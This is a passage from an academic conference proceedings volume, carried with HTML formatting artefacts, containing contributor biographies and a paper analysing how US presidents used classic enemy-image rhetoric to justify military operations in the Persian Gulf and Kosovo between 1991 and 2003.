<strong>in</strong>formation technology applications and their effects on the virtualized economy. His personal <strong>in</strong>terests<br />
<strong>in</strong>clude follow<strong>in</strong>g technology, hardware and software trends, literature along with music.<br />
Malgorzata Skorzewska-Amberg graduated from University of Warsaw (L.L.D) as well as Warsaw<br />
University of Technology (MSc IT). Appo<strong>in</strong>ted Assistant Professor 2009, Faculty of Law, Kozm<strong>in</strong>ski<br />
University Warsaw. For 17 years Senior IT Lecturer, Warsaw University of Technology. Research<br />
specialization comb<strong>in</strong><strong>in</strong>g two academic fields: digital data protection from legal as well as technical po<strong>in</strong>t of<br />
view.<br />
Ewald Stieger is currently study<strong>in</strong>g towards an MTech IT degree at the Nelson Mandela Metropolitan<br />
University <strong>in</strong> Port Elizabeth, South Africa. His subject of <strong>in</strong>terest dur<strong>in</strong>g the 4 th year was Information <strong>Security</strong><br />
and he decided to cont<strong>in</strong>ue with research <strong>in</strong> that field. The research he is conduct<strong>in</strong>g is concerned with<br />
<strong>in</strong>fluenc<strong>in</strong>g users towards more secure.<br />
Anna-Maria Talihärm is work<strong>in</strong>g <strong>in</strong> the NATO Cooperative Cyber Defence Centre of Excellence (CCD COE)<br />
Legal and Policy Branch, where her areas of research <strong>in</strong>clude European Union <strong>in</strong>formation society law, cyber<br />
terrorism and cyber crime. She is also currently striv<strong>in</strong>g for a PhD degree <strong>in</strong> Tartu University, specialis<strong>in</strong>g <strong>in</strong><br />
legal aspects of cyber crime.<br />
Risto Vaarandi received his PhD degree <strong>in</strong> Computer Eng<strong>in</strong>eer<strong>in</strong>g from Tall<strong>in</strong>n University of Technology, <strong>in</strong><br />
June 2005. S<strong>in</strong>ce May 2006, he has been hold<strong>in</strong>g a position of a scientist at CCD CoE. Risto's research<br />
<strong>in</strong>terests <strong>in</strong>clude event correlation, data m<strong>in</strong><strong>in</strong>g for event logs, network security, and system monitor<strong>in</strong>g.<br />
Joey Jansen van Vuuren Research Group Leader Cyber Defence for Scientific Research, CSIR South<br />
Africa, ma<strong>in</strong>ly <strong>in</strong>volved <strong>in</strong> research for SANDF and Government sectors on Cyber Defence. MSc from<br />
UNISA and researcher for 25 years. Focuses research around national security and analysis of Cyber<br />
thread us<strong>in</strong>g non-quantitative modell<strong>in</strong>g techniques. Actively <strong>in</strong>volved <strong>in</strong> facilitat<strong>in</strong>g Cyber awareness<br />
programs <strong>in</strong> South Africa<br />
Matt Warren is the Head of School at the School of Information System, Deak<strong>in</strong> University, Australia. He has<br />
ga<strong>in</strong>ed <strong>in</strong>ternational recognition for his scholarly work <strong>in</strong> the areas of Information <strong>Security</strong>, Risk Analysis,<br />
Electronic Commerce and Information Warfare. He has authored/co-authored over 180 books, book<br />
chapters, journal and conference papers.<br />
ix
Legitimate Defenses Aga<strong>in</strong>st Dangerous Archenemies: The<br />
Justifications by U.S. Presidents for the Initiation of Military<br />
Operations <strong>in</strong> the Persian Gulf and Kosovo, 1991-2003<br />
Kari Alenius<br />
University of Oulu, F<strong>in</strong>land<br />
kari.alenius@oulu.fi<br />
Abstract: This study will analyze how Presidents of the United States justified the <strong>in</strong>itiation of military operations <strong>in</strong><br />
three different cases: aga<strong>in</strong>st Iraq <strong>in</strong> the Persian Gulf <strong>in</strong> the years 1991 and 2003 and aga<strong>in</strong>st Yugoslavia/Serbia <strong>in</strong><br />
Kosovo <strong>in</strong> 1999. It is evident that these justifications exploited the most classical elements of a general image of the<br />
enemy, and ma<strong>in</strong>ly only those. The justifications that Presidents offered the public for the <strong>in</strong>itiation of military<br />
operations and the image that they attempted to portray of the enemy were thereby almost identical <strong>in</strong> all of the<br />
cases. Therefore, it can be concluded that speeches were for the most part built on a theoretical basis, and they did<br />
not necessarily have to be based on a reality of the actual country <strong>in</strong> question. Admittedly, similar features could be<br />
found <strong>in</strong> Iraqi and Serbian actions which it was possible to utilize <strong>in</strong> the construction of an image, but the identity of<br />
the image was first and foremost due to the identity of its use. The purpose was each time to justify why the United<br />
States took the offensive operation far beyond its own boundaries and without be<strong>in</strong>g attacked itself. In this case it<br />
was necessary to describe the actions, goals and the nature of the enemy <strong>in</strong> the most negative light, and one’s own<br />
correspond<strong>in</strong>g case was to be described <strong>in</strong> the best possible positive light. Only <strong>in</strong> this way was it possible to achieve<br />
sufficient justification for the <strong>in</strong>itiation of one’s own military operations. There was no room for br<strong>in</strong>g<strong>in</strong>g forth<br />
compromises or understand<strong>in</strong>g the views of the other party.<br />
Keywords: propaganda, rhetoric, enmity, United States, Iraq, Kosovo<br />
1. Introduction<br />
As a theoretical basis for the formation of general images of the enemy, for <strong>in</strong>stance Ofer Zur’s (1991:<br />
345-364) outl<strong>in</strong>ed classification of 1991 may be used. The contents of public speeches made by U.S.<br />
Presidents can then be compared to this theoretical model. In 1991 George Bush was President, <strong>in</strong> 1999<br />
William (Bill) Cl<strong>in</strong>ton and <strong>in</strong> 2003 George W. Bush. Each of them gave 4-6 pre-prepared broad public<br />
speeches relat<strong>in</strong>g to the topic just before the <strong>in</strong>itiation of military operations or immediately after they had<br />
begun.<br />
Ofer Zur (1991: 352) has presented the logic of enemy image construction <strong>in</strong> the form of the follow<strong>in</strong>g<br />
chart (see Figure 1). The chart is not complete, nor is it the only possible one that can illustrate the<br />
polarity between ‘us’ and ‘others’. To the chart presented by Zur we could add a few oppos<strong>in</strong>g pairs such<br />
as ‘malicious – benevolent’. On the other hand, <strong>in</strong> Zur’s chart ‘defense department – war department’ is<br />
actually only one practical application of the pr<strong>in</strong>cipled oppos<strong>in</strong>g pair ‘defensive – offensive’. It would be<br />
possible to add almost limitless similar variations on the same theme. The chart presented by Zur is<br />
however useful <strong>in</strong> its ma<strong>in</strong> characteristics and corresponds to the f<strong>in</strong>d<strong>in</strong>gs of several other researchers<br />
(e.g. Aho, 1994; Gergen and Gergen, 1986, 124-157, 310-315; Harle, 2000: 10-18; Wunsch, 2002: 82-<br />
85) who have also exam<strong>in</strong>ed enemy images theoretically.<br />
An analysis can be <strong>in</strong>itiated, for example, from the oppos<strong>in</strong>g pair ‘barbaric – humane’, cont<strong>in</strong>u<strong>in</strong>g to circle<br />
the chart <strong>in</strong> a counter clockwise pattern.<br />
Barbarity or cruelty or brutality is undoubtedly one of the traditional features attached to the enemy.<br />
Already <strong>in</strong> ancient Greece, from where the term derived to later European use, it was a central feature by<br />
which one’s own were separated from foreigners (Harle, 2000, 40-42). Ideas of <strong>in</strong>difference towards the<br />
suffer<strong>in</strong>g of others and reluctance to respect other people’s <strong>in</strong>terests (Bush, 1991-01-05; Cl<strong>in</strong>ton, 1999-<br />
03-24a; Bush, 2003-03-01), <strong>in</strong> short <strong>in</strong>humanity, are closely l<strong>in</strong>ked to the formation of the image of the<br />
enemy as one of barbarity. Respectively, one’s own side behaves selflessly, respect<strong>in</strong>g the dignity of<br />
others, for <strong>in</strong>stance <strong>in</strong> tak<strong>in</strong>g care of the well-be<strong>in</strong>g of civilians un<strong>in</strong>volved <strong>in</strong> military action, regardless of<br />
their nationality (Bush, 1991-01-16; Cl<strong>in</strong>ton, 1999-03-27; Bush, 2003-03-08).<br />
‘Tyranny’ aga<strong>in</strong>st ‘good leadership’ is a feature that when connected with the image of the enemy, is<br />
directed before all else to the subord<strong>in</strong>ates of leaders. The enemy can behave tyrannically towards<br />
outsiders, but at the same time the ord<strong>in</strong>ary citizens of the enemy country suffer even more from tyranny.<br />
Therefore, the leaders of the enemy act contrary to the <strong>in</strong>terests of their own citizens. They have come to<br />
1
Kari Alenius<br />
power and stayed there either through the strength of their false promises, mislead<strong>in</strong>g their subord<strong>in</strong>ates,<br />
or by us<strong>in</strong>g violence to boost their status (Bush, 1991-01-09; Cl<strong>in</strong>ton, 1999-03-24a; Bush, 2003-03-19).<br />
Figure 1: Chart show<strong>in</strong>g positive and negative qualities with<strong>in</strong> the split of ‘us – them’, by Ofer Zur (1991:<br />
352)<br />
2. Apply<strong>in</strong>g the basic features of an evil enemy to Iraq and Yugoslavia<br />
Thus, it can be argued that by one’s actions aga<strong>in</strong>st the leadership of the enemy, not only the best<br />
<strong>in</strong>terests of one’s own citizenry but also those of the ord<strong>in</strong>ary people of the enemy country are advanced.<br />
Accord<strong>in</strong>g to this logic, attack<strong>in</strong>g the leadership of the enemy is a good deed which selflessly serves<br />
almost all people. The psychological threshold of elim<strong>in</strong>at<strong>in</strong>g dangerous <strong>in</strong>dividuals is also lower than if<br />
one had to justify a crackdown on an entire people. At the same time, the possibility for success of one’s<br />
own plans appears substantially larger.<br />
The unreliability of the enemy is an important element especially when justify<strong>in</strong>g why negotiations should<br />
not be cont<strong>in</strong>ued. By argu<strong>in</strong>g that the other party has betrayed its promises <strong>in</strong> the past (Bush, 1991-01-<br />
16; Cl<strong>in</strong>ton, 1999-03-24b; Bush, 2003-03-08) listeners are placed <strong>in</strong> a situation of no choice: the<br />
resumption of negotiations would be po<strong>in</strong>tless and stupid, because the opponent would surely violate any<br />
possible agreements <strong>in</strong> the future also. With this logic, harder measures such as the use of military attack<br />
appear as the only competent way <strong>in</strong> which to solve problems. Anticipat<strong>in</strong>g the goals and motivations of<br />
the opponent with a suspicious and hostile tone is also one of the basic elements of the logic that<br />
separates ‘us’ and ‘others’ (Zur, 1991: 356-358).<br />
If the enemy is unreliable and brutal, he has more than likely committed crimes though the effect of these<br />
basic characteristics. In these exam<strong>in</strong>ed cases also the leadership of the enemy were directly branded as<br />
crim<strong>in</strong>als (Bush, 1990-12-24; Cl<strong>in</strong>ton, 1999-04-05; Bush, 2003-03-01). Indeed, by Western legal<br />
pr<strong>in</strong>ciples no <strong>in</strong>dividual can be called a crim<strong>in</strong>al before his case has been exam<strong>in</strong>ed <strong>in</strong> court and he has<br />
been convicted. Such a process had not taken place either <strong>in</strong> the case of Iraqi or Serbian leaders until<br />
2003; therefore there was no legal basis for nam<strong>in</strong>g them crim<strong>in</strong>als. Perhaps this is why there was no<br />
attempt to even justify the argument <strong>in</strong> the speeches of U.S. Presidents, but it was presented merely as a<br />
statement among other issues. Moral stigmatization was more important than legal consistency.<br />
Of Zur’s opposites, only primitiveness did not appear as such <strong>in</strong> speeches analyzed here. However, the<br />
idea appeared <strong>in</strong>directly when speeches referred to the civilized world and its values. If <strong>in</strong> speeches the<br />
civilized world was aga<strong>in</strong>st dictators (Bush, 1991-01-08; Bush, 2003-03-01), logically the dictators<br />
2
Kari Alenius<br />
represented the non-civilized, primitivity. Civilization, like most other terms be<strong>in</strong>g analyzed, was basically<br />
a completely subjective <strong>in</strong>terpretation. It did not have universal or generally accepted criteria even <strong>in</strong><br />
American culture. Thanks to its be<strong>in</strong>g a very loaded term, civilization was nevertheless well-suited to<br />
propagandistic use. The criteria’s basic room for <strong>in</strong>terpretation was also more of an advantage than<br />
disadvantage <strong>in</strong> propagandistic use as there was no great danger of be<strong>in</strong>g caught ‘mis<strong>in</strong>terpret<strong>in</strong>g’<br />
civilization.<br />
The dist<strong>in</strong>ction between ‘good versus evil’ can be regarded more as the sum of different components<br />
than as an <strong>in</strong>dividual element separat<strong>in</strong>g ‘us’ and ‘others’. This is why the concept did not generally<br />
present itself as such <strong>in</strong> the speeches of the Presidents. The only exception was George Bush’s (Bush,<br />
1991-01-09) ‘Open Letter to College Students’ <strong>in</strong> January 1991. In it the President presented the issue by<br />
cleanly tak<strong>in</strong>g advantage of dichotomy. In propagandistic use the terms ‘good’ and ‘evil’ might be<br />
perceived as problematic due to their all-<strong>in</strong>clusiveness. Listeners may feel that their op<strong>in</strong>ions are be<strong>in</strong>g<br />
directed <strong>in</strong> a bothersome way, if they are placed directly <strong>in</strong> front of the broadest possible conclusion:<br />
one’s own side is good and the enemy is evil. It is more effective to lead listeners without notice and<br />
gradually towards the same conclusion (Taylor, 2003: 6). Therefore, it pays to construct the opponent’s<br />
evil by referr<strong>in</strong>g to barbarism, unreliability, primitivity and other similar features. At the same time the<br />
alleged evil will be more credibly justified than if the end result was stated directly.<br />
The paired concept of ‘<strong>in</strong>nocent – guilty’ frequently appeared <strong>in</strong> the speeches of the Presidents (Bush,<br />
1991-01-05; Cl<strong>in</strong>ton, 1999-03-24a; Bush, 2003-03-19). It was told that the opponent was guilty of crimes,<br />
and at the same time his victims were reported as <strong>in</strong>nocent. Basically, the same considerations<br />
previously made <strong>in</strong> analyz<strong>in</strong>g the concept of crime apply to this paired concept. The opponent’s guilt was<br />
stated <strong>in</strong>directly by mak<strong>in</strong>g him responsible for the outbreak or imm<strong>in</strong>ent outbreak of war. When one’s<br />
side <strong>in</strong>itiates military operations, accord<strong>in</strong>g to this logic it is not an attack, but an <strong>in</strong>herent consequence of<br />
natural law result<strong>in</strong>g from the evil deeds of the enemy. By act<strong>in</strong>g the wrong way the enemy <strong>in</strong>itiates<br />
military operations aga<strong>in</strong>st himself (Zur, 1991: 356-358). At the same time, the responsibility for human<br />
suffer<strong>in</strong>g and material destruction that is always caused by war goes to the enemy.<br />
Closely related to the aforementioned, one’s own actions are described as defensive, without exception.<br />
Although <strong>in</strong> a tactical or operational sense the question would be about attacks aga<strong>in</strong>st the enemy, <strong>in</strong> a<br />
strategic sense the question is nevertheless about defence. For <strong>in</strong>stance, one’s own forces defend<br />
civilization, justice, humanity and <strong>in</strong>nocent civilians (Bush, 1991-01-09; Cl<strong>in</strong>ton, 1999-03-27; Bush, 2003-<br />
03-08). Respectively, the actions of the enemy are always aggressive (Bush, 1990-12-24; Cl<strong>in</strong>ton, 1999-<br />
04-03; Bush, 2003-03-16), and their possible strategic motives of defence cannot be taken <strong>in</strong>to public<br />
consideration. From a moral and legal perspective defence is generally accepted, but as a rule attack is<br />
not. At the very least demonstrat<strong>in</strong>g that attack is legitimate is difficult, and the outcome on the<br />
audience’s part is unsure. Thus, it is preferable to try to demonstrate that one’s own actions are always<br />
defensive regardless of their outward appearance, and that the actions of the opponent are aggressive.<br />
The next two paired concepts on Zur’s chart are so close to the themes already discussed that already<br />
presented considerations need not be repeated <strong>in</strong> their context. ‘For civil rights – oppressive’ is<br />
essentially the same as ‘good car<strong>in</strong>g leaders – tyranny’. At the same time the pair ‘defense department –<br />
war department’ does not present anyth<strong>in</strong>g new to the ‘defensive – offensive’ theme that was discussed<br />
above. Instead, ‘peace’ and ‘belligerence’ (or ‘brutal expansionism’) offer additional <strong>in</strong>sights.<br />
In analyz<strong>in</strong>g the Presidents speeches, on several occasions it was assured that one’s own party was only<br />
striv<strong>in</strong>g for peace. Peace was also expressed as a central goal of the future (Bush, 1990-12-24, Cl<strong>in</strong>ton,<br />
1999-03-24b; Bush, 2003-03-08). In turn, it was said that the enemy had already broken peace with their<br />
expansionist activities. Furthermore, when negotiations had been offered as a means of solv<strong>in</strong>g<br />
problems, the enemy had refused them on a pretext of excuses or by simply fail<strong>in</strong>g to react to offers<br />
(Bush, 1991-01-16; Cl<strong>in</strong>ton, 1999-03-24a; Bush, 2003-03-16).<br />
The enemy therefore does not even want peace, but war. As however one’s own side is not yet at war<br />
with the enemy and <strong>in</strong> this sense peace prevails, it is necessary to expla<strong>in</strong> to the public why peace is not<br />
real peace. In the Presidents speeches (Bush, 1991-01-08; Cl<strong>in</strong>ton, 1999-03-24a; Bush, 2003-03-08) the<br />
current state of peace is presented as false, as <strong>in</strong> its shelter the enemy is act<strong>in</strong>g aggressively, is<br />
upkeep<strong>in</strong>g an unfair situation and is prepar<strong>in</strong>g for war. ‘Real peace’ can therefore only be achieved when<br />
the enemy is forced to give up their evil deeds and when the current unfair situation is corrected.<br />
Attack<strong>in</strong>g the enemy is therefore the promotion of peace.<br />
3
Kari Alenius<br />
The last two closely related paired concepts (‘sacred – profane’ and ‘godly – atheist’) were not directly<br />
encountered <strong>in</strong> the Presidents’ speeches. An <strong>in</strong>direct reference is apparent <strong>in</strong> the conclusions of the<br />
speeches, <strong>in</strong> which the Presidents accord<strong>in</strong>gly wish God’s bless<strong>in</strong>g on their own country and people<br />
(Bush, 1991-01-16; Cl<strong>in</strong>ton, 1999-03-24a; Bush, 2003-03-19). It can be theoretically read that one’s own<br />
side was seen to be on God’s side and that one’s own objectives <strong>in</strong> this sense were sacred. The counter<br />
party would then have to be someth<strong>in</strong>g else, if not atheist, at least someth<strong>in</strong>g other than be<strong>in</strong>g basically<br />
secure <strong>in</strong> a real and true God. Then too the enemy’s actions were unholy.<br />
The probable practical reason why a direct religious confrontation was avoided <strong>in</strong> speeches was related<br />
to two po<strong>in</strong>ts. In the case of Iraq the fact that it was world-politically dangerous to present the controversy<br />
as a religious issue led to caution. Even if Saddam Husse<strong>in</strong> was presented as an atheist, it was possible<br />
that br<strong>in</strong>g<strong>in</strong>g forth religion would have led to <strong>in</strong>creas<strong>in</strong>g perceptions <strong>in</strong> the world of a battle between<br />
Christianity and Islam. In any case Saddam Husse<strong>in</strong> was formally a Muslim and Iraq was a country with a<br />
strong Muslim majority, and it was obviously <strong>in</strong> his <strong>in</strong>terests if he could have presented himself as a<br />
champion of the Muslim faith and world aga<strong>in</strong>st an aggressive Christian West. In the case of Kosovo,<br />
aga<strong>in</strong> the conditions were not right for br<strong>in</strong>g<strong>in</strong>g up religion, as the Albanians were mostly Muslim and the<br />
Serbs Christians. Mixed feel<strong>in</strong>gs would certa<strong>in</strong>ly have been aroused <strong>in</strong> the American public if statements<br />
would have been made about fight<strong>in</strong>g alongside Muslims on behalf of the right faith aga<strong>in</strong>st Christian<br />
enemies.<br />
Based on what has been previously presented it can be seen that the classical elements <strong>in</strong> construct<strong>in</strong>g<br />
the image of the enemy, which Zur for <strong>in</strong>stance has classified, were <strong>in</strong> active use when the Presidents of<br />
the United States justified the military operations <strong>in</strong>itiated by their country <strong>in</strong> the Persian Gulf and <strong>in</strong><br />
Kosovo. The image of the enemy consisted of about n<strong>in</strong>ety percent of these very elements, with m<strong>in</strong>imal<br />
verbal and conceptual variations. The most frequently repeated paired concepts <strong>in</strong> def<strong>in</strong><strong>in</strong>g one’s side<br />
and the oppos<strong>in</strong>g side were ‘humane – barbaric’, ‘good car<strong>in</strong>g leaders – tyranny’, ‘defensive – offensive’<br />
and ‘trustworthy – untrustworthy’. The other analyzed paired concepts based on Zur’s chart also<br />
systematically appeared <strong>in</strong> the speeches, although they were not repeated as often, or they were referred<br />
to more <strong>in</strong>directly.<br />
3. Situation-specific features complement basic features<br />
Furthermore, the speeches repeated two additional elements, the importance of one’s own <strong>in</strong>terests and<br />
the danger of the enemy. Both were necessary to give substance as to why immediately <strong>in</strong>itiat<strong>in</strong>g a war<br />
was necessary. The speeches justified <strong>in</strong> many words and from several po<strong>in</strong>ts of view why the enemy<br />
was completely wrong <strong>in</strong> pr<strong>in</strong>ciple and why one’s own side was completely right <strong>in</strong> pr<strong>in</strong>ciple. However, it<br />
could rema<strong>in</strong> somewhat unclear to the audience why it was necessary to <strong>in</strong>itiate a war aga<strong>in</strong>st the<br />
enemy. Were the theoretical bases alone sufficient? Was it worth sacrific<strong>in</strong>g one’s own soldiers on behalf<br />
of an abstract ‘justice’ to quell an equally abstract ‘<strong>in</strong>justice’? A part answer was attempted <strong>in</strong> referr<strong>in</strong>g to<br />
stopp<strong>in</strong>g brutality <strong>in</strong> the speeches. War was necessary <strong>in</strong> order to prevent the enemy from kill<strong>in</strong>g and<br />
persecut<strong>in</strong>g <strong>in</strong>nocent victims <strong>in</strong> Kuwait, Iraq and Kosovo (Bush, 1991-01-09; Cl<strong>in</strong>ton, 1999-03-27; Bush,<br />
2003-03-01). Here there was no question of theory, but the actual sav<strong>in</strong>g of human lives, which was a<br />
noble and generally laudable aim.<br />
Nevertheless, some of the audience could still call <strong>in</strong>to question the necessity of tak<strong>in</strong>g up war. Why<br />
sacrifice Americans to save Arabs liv<strong>in</strong>g <strong>in</strong> the Middle East or Albanians liv<strong>in</strong>g <strong>in</strong> Europe? This question<br />
could be answered by argu<strong>in</strong>g that the question was not primarily about strangers liv<strong>in</strong>g far away, but at<br />
stake were the Americans’ own vital national <strong>in</strong>terests (Bush, 1990-12-24; Cl<strong>in</strong>ton, 1999-03-24a; Bush,<br />
2003-03-01). What these <strong>in</strong>terests specifically <strong>in</strong>cluded was not necessarily stated, so that def<strong>in</strong><strong>in</strong>g<br />
questions could be avoided. A few of the speeches however could refer on a general level to peace,<br />
stability, economic prosperity and above all to security. The most commonly used detailed reference was<br />
that war was necessary to ensure the Americans their own safety (Bush 1991-01-16; Cl<strong>in</strong>ton 1999-03-<br />
24b; Bush, 2003-03-04). At the same time the safety of residents <strong>in</strong> the Middle East and Europe was<br />
safeguarded, but at the top of the priority list was ensur<strong>in</strong>g the secure future of one’s own community.<br />
So that war could be presented as the protector of one’s own safety, there first had to be a grave threat to<br />
security. In the case of Saddam Husse<strong>in</strong> the appropriate threats were his alleged projects for weapons of<br />
mass destruction, especially the acquisition<strong>in</strong>g of nuclear weapons. If Saddam Husse<strong>in</strong> was successful <strong>in</strong><br />
his project, the United States would no longer be safe anymore than any other state. As the speeches<br />
stated (Bush, 1991-01-05; Bush, 2003-03-04), Saddam Husse<strong>in</strong> had already used weapons of mass<br />
destruction aga<strong>in</strong>st his own people and he was also unpredictable. It was necessary to act immediately,<br />
4
Kari Alenius<br />
so that the enemy would not have time to grow too strong and frighten<strong>in</strong>g. Persuasive rhetoric more<br />
generally attempts to make hasty decisions by present<strong>in</strong>g delay as disastrous (Luostar<strong>in</strong>en, 2002: 36).<br />
Thus, psychological pressure can be put on listeners not to rema<strong>in</strong> reflect<strong>in</strong>g on issues themselves. They<br />
are preferably directed to act quickly and without question<strong>in</strong>g the already thought-out models that their<br />
persuaders offer.<br />
In Kosovo’s case it was not possible to refer to the threat created by weapons of mass destruction, as the<br />
Yugoslavian/Serbian leadership had not shown any <strong>in</strong>terest <strong>in</strong> them. Instead, it was possible to exploit<br />
the image of the Balkans as a ‘powder keg’ that had allegedly sparked two world wars (Cl<strong>in</strong>ton, 1999-03-<br />
24a; Cl<strong>in</strong>ton 1999-03-27). This was obviously a coarse simplification, and additionally <strong>in</strong> the case of the<br />
Second World War, it was basically very unclear how even the formal reason for the outbreak of war<br />
could be situated <strong>in</strong> the Balkans and the area that was presumed prone to crisis. In spite of these factors<br />
the ‘powder keg’ concept was useful <strong>in</strong> the case of Kosovo because such a feature was commonly<br />
attached to the Balkans. In Cl<strong>in</strong>ton’s (1999-03-24b; 1999-03-26) speeches, immediately <strong>in</strong>itiat<strong>in</strong>g acts of<br />
war aga<strong>in</strong>st Yugoslavia were necessary so that the escalation and broaden<strong>in</strong>g of the crisis could be<br />
prevented. Any delay would only lead to greater damage and more victims because the problem had to<br />
be solved by force sooner or later. The logic of urgency was exactly the same as <strong>in</strong> the case of Iraq.<br />
The analogy to the world wars was also used to explicitly justify the need for a rapid response. Accord<strong>in</strong>g<br />
to Cl<strong>in</strong>ton (1999-03-24a) the European democracies as well as the United States itself had made a great<br />
mistake <strong>in</strong> hesitat<strong>in</strong>g and had too long attempted to mediate. How the experiences of the world wars<br />
could certa<strong>in</strong>ly prove that the evolution of Yugoslavia would be the same was of course unclear at the<br />
level of pr<strong>in</strong>ciple. The comparison however justified the fact that with a sufficient degree of probability the<br />
development would be the same: it would be foolish to make the same error a third time. At the same<br />
time the analogy to the world wars was fitt<strong>in</strong>g <strong>in</strong> justify<strong>in</strong>g the war effort of the United States far from<br />
home. As the USA had already twice rescued Europe (Cl<strong>in</strong>ton, 1999-03-24a), it would ‘naturally’ once<br />
aga<strong>in</strong> resolve the crisis. Accord<strong>in</strong>g to this logic the world wars undoubtedly showed that the Europeans<br />
were not able to do so themselves. Thus, the United States was forced to participate, as <strong>in</strong> the light of<br />
history it had no choice.<br />
The image created by Presidents <strong>in</strong> the Persian Gulf <strong>in</strong> the years 1991 and 2003 as <strong>in</strong> Kosovo <strong>in</strong> 1999<br />
was also, when considered as a whole, unconditional <strong>in</strong> the same way. The enemy was thoroughly evil,<br />
guilty of heavy crimes, and was prepar<strong>in</strong>g to carry out even more horrific acts soon. This ever-grow<strong>in</strong>g<br />
danger which was already directed to the United States itself def<strong>in</strong>itely had to be elim<strong>in</strong>ated now. One’s<br />
own side had done its utmost to restore peace and justice, but all sensible proposals to defuse the crisis<br />
fell down with the enemy’s reluctance to settle issues.<br />
There rema<strong>in</strong>ed no other option than the use of military force. This had to be undertaken with the<br />
requirement of law and morals and the guidance of human values. The responsibility for casualties and<br />
losses result<strong>in</strong>g from acts of war was the enemy’s alone, which had with its own actions forced the United<br />
States to react exactly as occurred <strong>in</strong> the spr<strong>in</strong>g of 1991, 1999 and 2003.<br />
References<br />
Aho, J. (1994) This th<strong>in</strong>g of darkness, University of Wash<strong>in</strong>gton Press, Seattle.<br />
Bush, G. (1990-12-24) Christmas Message to American Troops, [onl<strong>in</strong>e], Available:<br />
http://bushlibrary.tamu.edu/research/public_papers.php?id=2572&year=1990&month=12 [18 Nov 2010].<br />
Bush, G. (1991-01-05) Radio Address to the Nation on the Persian Gulf Crisis, [onl<strong>in</strong>e], Available:<br />
http://bushlibrary.tamu.edu/research/public_papers.php?id=2596&year=1991&month=01 [18 Nov 2010].<br />
Bush, G. (1991-01-08) Message to Allied Nations on the Persian Gulf Crisis, [onl<strong>in</strong>e], Available:<br />
http://bushlibrary.tamu.edu/research/public_papers.php?id=2598&year=1991&month=1 [18 Nov 2010].<br />
Bush, G. (1991-01-09) Open Letter to College Students on the Persian Gulf Crisis, [onl<strong>in</strong>e], Available:<br />
http://bushlibrary.tamu.edu/research/public_papers.php?id=2608&year=1991&month=1 [18 Nov 2010].<br />
Bush, G. (1991-01-16) Address to the Nation Announc<strong>in</strong>g Allied Military Action <strong>in</strong> the Persian Gulf, [onl<strong>in</strong>e], Available:<br />
http://bushlibrary.tamu.edu/research/public_papers.php?id=2625&year=1991&month=1 [18 Nov 2010].<br />
Bush, G. W. (2003-03-01) President’s Radio Address, [onl<strong>in</strong>e], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030301.html<br />
[18 Nov 2010].<br />
Bush, G. W. (2003-03-04) President’s Remarks to American Medical Association, [onl<strong>in</strong>e], Available:<br />
http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030304-11.html [18 Nov 2010].<br />
Bush, G. W. (2003-03-08) War on Terror [onl<strong>in</strong>e], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030308-1.html<br />
[18 Nov 2010].<br />
Bush, G. W. (2003-03-16) President Bush: Monday “Moment of Truth” for World on Iraq, [onl<strong>in</strong>e], Available:<br />
http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030316-3.html [18 Nov 2010].<br />
5
Kari Alenius<br />
Bush, G. W. (2003-03-19) President Bush Addresses the Nation, [onl<strong>in</strong>e], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030319-17.html<br />
[18 Nov 2010].<br />
Cl<strong>in</strong>ton, W. (1999-03-24a) Statement by the President to the Nation, [onl<strong>in</strong>e], Available:<br />
http://cl<strong>in</strong>ton6.nara.gov/1999/03/1999-03-24-remarks-by-the-president-to-the-nation-on-kosovo.html [19 Nov<br />
2010].<br />
Cl<strong>in</strong>ton, W. (1999-03-24b) Statement by the President on Kosovo, [onl<strong>in</strong>e], Available:<br />
http://cl<strong>in</strong>ton6.nara.gov/1999/03/1999-03-24-statement-by-the-president-on-kosovo-air-strikes.html [19 Nov<br />
2010].<br />
Cl<strong>in</strong>ton, W. (1999-03-26) Text of a Letter from the President to the Speaker of the House of Representatives and the<br />
President Pro Tempore of the Senate, [onl<strong>in</strong>e], Available: http://cl<strong>in</strong>ton6.nara.gov/1999/03/1999-03-26-text-of-aletter-to-the-congress-on-kosovo.html<br />
[19 Nov 2010].<br />
Cl<strong>in</strong>ton, W. (1999-03-27) Radio Address of the President to the Nation, [onl<strong>in</strong>e], Available:<br />
http://cl<strong>in</strong>ton6.nara.gov/1999/03/1999-03-27-radio-address-on-nato-air-strikes-for-peace-<strong>in</strong>-kosovo.html [19 Nov<br />
2010].<br />
Cl<strong>in</strong>ton, W. (1999-04-03) Radio Address by the President to the Nation, [onl<strong>in</strong>e], Available:<br />
http://cl<strong>in</strong>ton6.nara.gov/1999/04/1999-04-03-radio-address-on-peace-<strong>in</strong>-kosovo.html [19 Nov 2010].<br />
Cl<strong>in</strong>ton, W. (1999-04-05) Statement by the President, [onl<strong>in</strong>e], Available: http://cl<strong>in</strong>ton6.nara.gov/1999/04/1999-04-<br />
05-statement-by-the-president-on-kosovo.html [19 Nov 2010].<br />
Gergen, K. and Gergen, M. (1986) Social psychology, Spr<strong>in</strong>ger Verlag, New York.<br />
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other <strong>in</strong> Western Political Thought and<br />
History, Praeger, Westport.<br />
Luostar<strong>in</strong>en, H. (2002) ‘Propaganda, media ja sota’, <strong>in</strong> Huht<strong>in</strong>en A. (ed.) Propagandan renessanssi – Julkisen<br />
manipulaation paluu, Maanpuolustuskorkeakoulu, Hels<strong>in</strong>ki.<br />
Taylor, P. (2003) Munitions of the m<strong>in</strong>d. A history of propaganda from the ancient world to the present era,<br />
Manchester University Press, Manchester.<br />
Wunsch, S. (2002), ’Image Research and the Enemy Image: The Soviet Union <strong>in</strong> F<strong>in</strong>nish Newspapers dur<strong>in</strong>g the<br />
W<strong>in</strong>ter War (November 30, 1939 – March 13, 1940)’, <strong>in</strong> Alenius, K., Fält, O. and Jalag<strong>in</strong> S. (eds.) Look<strong>in</strong>g at the<br />
Other. Historical study of images <strong>in</strong> theory and practice, Oulu University Press, Oulu.<br />
Zur, O. (1991) ’The love of hat<strong>in</strong>g: the psychology of enmity’, History of European Ideas, Vol 13, No. 4, pp 345-369.<br />
6
Use of Compression Methods for Data <strong>Security</strong> Assurance<br />
Dom<strong>in</strong>ic Asamoah 1 and William Oblitey 2<br />
1 Kwame Nkrumah University of Science and Technology (KNUST), Ghana<br />
